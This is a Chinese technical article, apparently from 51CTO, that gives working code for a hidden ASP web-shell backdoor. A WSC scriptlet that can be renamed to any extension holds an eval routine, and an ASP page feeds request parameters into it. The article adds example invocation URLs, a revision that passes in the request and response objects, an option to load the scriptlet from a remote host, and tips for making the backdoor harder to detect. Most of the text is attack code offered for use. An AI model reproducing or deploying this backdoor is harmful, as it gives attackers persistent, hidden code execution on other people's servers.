利用wsc来做一个asp后门及后续-51CTO.COM

ScriptCodingInfo.wsc代码如下，该文件可以改成任意后缀：

以下是引用片段：
 
 
 
 
 
 
 
sub lcx(b) 
eval(b) 

end sub 
]]>

backdoor.asp内容如下：

以下是引用片段：
<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx(b) 
%>

调用方法如下：

以下是引用片段：
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意这里的a=只能是vbs的代码，不可以接受像response、request之类的asp的东东。如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc，像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服务器中不可以。算一个思路，鸡肋，谁有更好的办法完善，能够直接调用cs的asp木马的c端就好了。
#p#

突然看到了lcx巨形牛头人发了一个帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛头人所说的，没有加进request和response类很不爽。于是我作了一个简单的修改。

ScriptCodingInfo.wsc 代码

以下是引用片段：
 
 
 
 
 
 
 
sub lcx(b,a,c) 
set response=c ’加入request和response进来。就可以直接调用了 
set request=a ’修改 by:phpeval.cn 
eval(b) 
end sub 
]]>

test.asp代码：

<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx b,request,response 
%>

测试方法：

以下是引用片段：
http://phpeval.cn/test.asp?a=execute
("response.write(request(""c"")):response.end")&c=phpeval

不知道这是不是lcx巨形牛头人所说的那个c端。我一直不太理解“能够直接调用cs的asp木马的c端就好了”lcx巨牛的这句话的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段：
http://phpeval.cn/test.asp?a=execute("response.write(request(""c""))
:response.end")&b=script:d:/web/wwwroot/ScriptCodingInfo.
wsc%23haiyangtop&c=phpeval

这样好象更有诱惑性。

【编辑推荐】